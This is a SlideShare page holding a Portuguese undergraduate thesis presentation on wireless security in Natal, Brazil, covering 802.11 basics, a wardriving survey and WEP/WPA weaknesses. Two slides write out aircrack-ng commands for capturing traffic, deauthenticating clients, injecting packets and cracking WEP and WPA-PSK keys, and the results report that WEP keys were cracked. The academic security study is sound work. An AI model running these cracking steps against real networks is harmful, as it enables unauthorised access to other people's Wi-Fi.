Apresentação4 final

527 visualizações

Publicada em

1 comentário
0 gostaram
Estatísticas
Notas
  • Segurança de redes sem fio, com tecnicas de Wardriving
       Responder 
    Tem certeza que deseja  Sim  Não
    Insira sua mensagem aqui
  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
527
No SlideShare
0
A partir de incorporações
0
Número de incorporações
2
Ações
Compartilhamentos
0
Downloads
5
Comentários
1
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Apresentação4 final

  1. 1. DIRETORIA ACADÊMICA DE GESTÃO E INFORMÁTICA CURSO SUPERIOR DE TECNOLOGIA EM REDES DE COMPUTADORES Robson Ferreira da SilvaANÁLISE DE SEGURANÇA DE REDES SEM FIO NA CIDADE DE NATAL/RN NATAL/RN NOV/2012 1
  2. 2. ROBSON FERREIRA DA SILVAANÁLISE DE SEGURANÇA DE REDES SEM FIO NA CIDADE DE NATAL/RN Trabalho apresentado à banca examinadora Referente à conclusão do Curso de Tecnologia de Redes de Computadores. Orientador: Professor Ricardo Kléber NATAL/RN NOV/2012 2
  3. 3. SUMÁRIO1 INTRODUÇÃO2 REDES SEM FIO3 METODOS4 1 ª FASE – MAPEAMENTO5 2 ª FASE- ANÁLISE DOS DADOS6 3ª FASE- TESTE DE VULNERABILIDADE7 CONSIDERAÇÕES FINAIS 3
  4. 4. 1 INTRODUÇÃO A indústria decidiu (IEEE) 802.11 foi Benefícios formado. VS Riscos OBJETIVO GERAL Motivações 4
  5. 5. 2 REDES SEM FIO O IEEE 802 é um conjunto de padrões desenvolvidos para definir métodos de acesso e controle para redes locais (LANs) e metropolitanas (MANs). E definiu uma hierarquia de padrões complementares para redes sem fio. WWAN 802.202.1 IEEE 802.11 WLAN (WIRELESS LOCAL AREA NETWORK) WMAN O protocolo IEEE 802.11 é um padrão de 802.16 comunicações que define o uso dos dois níveis mais baixos da arquitetura OSI (Open Systems WLAN interconnection) a camada física 802.11 enlace de dados (SANCHES, 2005). e de WPAN 802.15 5
  6. 6. 2.1.1 FrequênciasAs WLANs baseadas em radio frequência usam as faixas defrequência industrial, científica e médica (ISM). Infravermelho 1Mbps ou 2 Mbps FHSS (Frequency Hopping Spread Spectrum) 1 Mbps, com 2 Mbps opcional Frequências DSSS (Direct Sequence Spread Spectrum) 1Mbps ou 2 Mbps HR–DSSS (High Rate Direct Sequence Spread Spectrum) 1, 2, 5 e 11 Mbps OFDM (Orthogonal Frequency Division Multip lexing) 54 Mbps 6
  7. 7. 2.1.2 Subcamada MAC 802.11 (Media Access Control) Camada responsável pela organização do acesso ao meio físico compartilhado, evitando colisões e os conflitos. SUBCAMADA MAC 802.11 DCF Modos de operação PCF (Opcional) CSMA/CA(Canal físicos) (Canal Virtual)(Função de Coordenação Distribuída) (Função de coordenação de ponto) 7
  8. 8. 2.1.3 TopologiasO grupo 802.11, reúne uma série de especificações onde basicamentedefine como deve ser a comunicação entre um dispositivo cliente e oconcentrador ou a comunicação entre dois dispositivos clientes(RUFINO, 2005). Conjunto de Serviços Básicos Ad-Hoc Independentes (IBSS). Infra – Estrutura ESS BSS (Conjunto de Serviços (Conjunto de Serviços Estendidos) Básicos) 8
  9. 9. 2.1.4 Principais Padrões Padrão 802.11n Padrão 100 a 500 Mbps 802.11g 54Mbps Padrão Frequência Frequência 2,4GHz 2.4 ou 5GHz 802.11a 54Mbps Frequência Padrão 5GHz 802.11b De 1,2, 5.5, e 11 Mbps; Padrão Frequência.- 802.11 2,4GHz a 2Mbps 2,485 GHz. Frequência 2,4 GHz 9
  10. 10. 2.1.5 Segurança em redes sem fio4.2.5.1 Protocolos de Segurança e Criptografia WEP WPA WPA2 REDES SUPORTADAS IBSS, BSS, ESS BSS, ESS IBSS,BSS,ESS ALGORITIMO DE RC4 RC4 RC4, AES CRIPTOGRAFIA METODO DE WEP TKIP TKIP OU AES CCMP CRITPTOGRAFIA AUTENTICAÇÃO Shared Key PSK, Infra-Extrutura PSK, Infra-Extrutura 802.1x e EAP 802.1x e EAP INTEGRIDADE DOS CRC-32 CRC-32 e MIC CBC-MAC DADOS TAMANHO DAS 40 OU 104 bits 128 bits 128 , 192 ou 256 bits CHAVES IV (VETOR DE 24 bits 48 bits Substituído por um INICIALIZAÇÃO) Packet Number de 48 bits 10
  11. 11. 2.1.5.2 Vulnerabilidades dos Protocolos de Criptografia Vulnerabilidade do WEPO WEP é baseado em processo criptográfico RC4. Durante atransmissão do pacote IV (Vetor de inicialização) de 24 bits éescolhido randomicamente e é anexada a chave WEP para forma achave de 64 ou 128 bits. WEP 1 - O ataque FMS (Fluhrer-Mantin-Shamir) 2 - O ataque Korek 3 - O ataque PTW (Pyshkin, Tews, Weinmann) 11
  12. 12.  Vulnerabilidade do WPA É possível descobrir a chave de encriptação em uma rede WPA-PSKvia força bruta, mas isso só é viável para chaves com poucoscaracteres, ou que são baseadas em palavras encontradas nodicionário (MORIMOTO, 2006). Chave four-way Wordlist WPA/WPA2 handshake -PSK 12
  13. 13. 2.1.6 Técnicas de Exploração de Vulnerabilidades em Redes sem Fio2.1.6.1 WardrivingWardriving é o ato de mover-se em torno de uma área específica,realizando o mapeamento de pontos de acesso sem fio para finsestatísticos. Essa técnica foi inventada por Peter Shipley. Ferramentas de Hardware Ferramentas de Softwares 13
  14. 14. 2.1.6.2 WarchalkingWarchalking é o ato de fazer marcas de giz em edifícios ou calçadas paraindicar a presença e a disponibilidade de redes sem fio (HURLEY, 2004).2.1.6.3 EavesdroppingEavesdropping é interceptar comunicações sendo um ouvinte nãopretendido (MATOS, 2010). 14
  15. 15. 3 METODOS FERRAMENTAS DE SOFTWARES UTILIZADOS FERRAMENTAS HARDWARES UTILIZADOS Computador Kismet Móvel (Versão (Laptop) 2008-05-R1- 4.1) GPSD (Global Fonte Veicular Positioning Placa de Universal SystemWi-Fi Rede ExtGPS Daemon) (version 2.36) Sistema Operacional GPS (Global Antena Earth Google Kisgearth Positioning Externa System) Suíte Aircrack-ng Dispositivo Bluetooth Softwares livres ou com licença gratuita 15
  16. 16. 4 1ª FASE – MAPEAMENTO DE REDE (WARDRIVING)4.1 LOCALIZAÇÃO DA PESQUISA DE CAMPO A localização da pesquisa é a cidade de Natal, mesorregião do Leste Potiguar, capital do Rio Grande do Norte. 16
  17. 17. 4.1.1 Wardriving em Área Comercial Pontos de rede identificados no mapeamento foram 319. 17
  18. 18. 4.1.2 Wardriving em área de Escritórios Pontos de rede identificados no mapeamento foram 493. 18
  19. 19. 4.1.3 Wardriving em Área Residencial Pontos de rede identificados no mapeamento foram 844. 19
  20. 20. 5 2ª FASE – ANÁLISE DOS DADOS (WARDRIVINGS) Serão apresentados os valores em Gráficos, fornecendo informações rápidas e seguras para determinações mais coerentes.5.1 ORIGEM DOS DADOS 20
  21. 21. ‹#›
  22. 22. ‹#›
  23. 23. ‹#›
  24. 24. ‹#›
  25. 25. 5.2.1 Situação geral da análise Distribuição Conjunta Relativa em barra e Absoluta emcom da Frequência relativa das redes abertas de acordo linha Wardriving de Segurança Situaçao da vários autores LUCCHESE, 2007; PINZON, 2009; NEVES, 2009; SOUZA, DARWICH, 2009] Fonte: [PRÓPRIA; LEITE, 2009; CARDOSO, RESENDE, VILELA, 2007; 60% 850 900 16.91% 800 50% 20.00% 700 Frquência Relativa em (%) Natal 40% 600 1638 São Paulo 500 30% 17.37% 4220 51.89% 400 277 26.00% 248 Rio de Janeiro 20% 233 300 4000 Farroupilha 200 10% 16.91% 247 14.22% 15.14% 22 100 8 35.00% Porto Alegre 0% 14.00% 1.34% 0.49% 8360 João Pessoa 190 26.00% Belém 1795 25
  26. 26. 6 3ª FASE – ANALISE DE VULNERABILIDADESPara efeito ético e legal serão expostos apenas os três primeiros bytesda placa de rede, chamados OUI (Organizationally UniqueIdentifier), que são destinados à identificação do fabricante.Além do método PTW (Pyshkin, Tews, Weinmann) eFMS/KoreK, adicionalmente, o programa oferece um método dedicionário (wordlist) para determinar a chave pré-compartilhadas WPA-PSK. 26
  27. 27. 6.1.1 Analise na área Comercial  Protocolo WEP # airodum-ng --encrypt wep wlan0 # airodump-ng –w <arquivo> --bssid 00:1A:3F:XX:XX:XX -c 4 wlan0 # aireplay-ng -3 -b 00:1A:3F:XX:XX:XX -h 00:07:AB:XX:XX:XX wlan0 # aircrack-ng –z –n128 Arquivo.cap 27
  28. 28.  Protocolo WPA/WPA2-PSK # airodump-ng –w <arquivo> --bssid 00:18:E7:XX:XX:XX -c 10 wlan0 # airepley-ng -0 5 –a 00:18:E7:XX:XX:XX -c 00:17:C4:XX:XX:XX wlan0 # aircrack-ng –w wordlist.lst,wordlist1.lst,wordlist2.lst arquivo.cap 28
  29. 29. RESULTADO DOS TESTES DE VULNERAVILIDADE OCORREU A QUEBRA ? COMERCIAL ESCRITÓRIOS RESIDENCIALWEP WPA2-PSK WEP WPA2-PSK WEP WPA-PSKSIM NÃO SIM NÃO SIM NÃO 29
  30. 30. 7 CONSIDERAÇÕES FINAIS Objetivos Alcançados ContribuiçãoIEEE 802.11 (situação da da pesquisa Metodologia Dificuldades WLAN segurança e e trabalhos Vulnerabilid futuros ades) 30
  31. 31. REFERÊNCIASLUCCHESE, Felipe. Utilizando Wardriving para a detecção de Vulnerabilidadesem Redes locais Sem Fio na região de Farroupilha. 2007.132 p..(Ciência dacomputação).Centro Universitário Feevale, Instituto de Ciências Exatas eTecnológicas. Novo Hamburgo.MORIMOTO, Carlos E. Linux Redes e Servidores. 2. Ed. Porto Alegre: Sul, 2006.-______.Padrões Wireless. Disponívelem:<www.hardware.com.br/tutoriais/padroes-wireless>. Acesso em: 19 Setembro2012.RUFINO, Nelson Murilo de Oliveira. Segurança em Redes sem fio: Aprenda aproteger suas informações em ambientes Wi-Fi e Bluetooh. 2. ed. São Paulo:Novatec, 2005. 224p.HURLEY, Cris, et al.Wardriving: Detect, Defend A Guide to Wireless Security.Seattle:blackhat, 2004. 524 p. 31
  32. 32. MUITO OBRIGADO! 32

×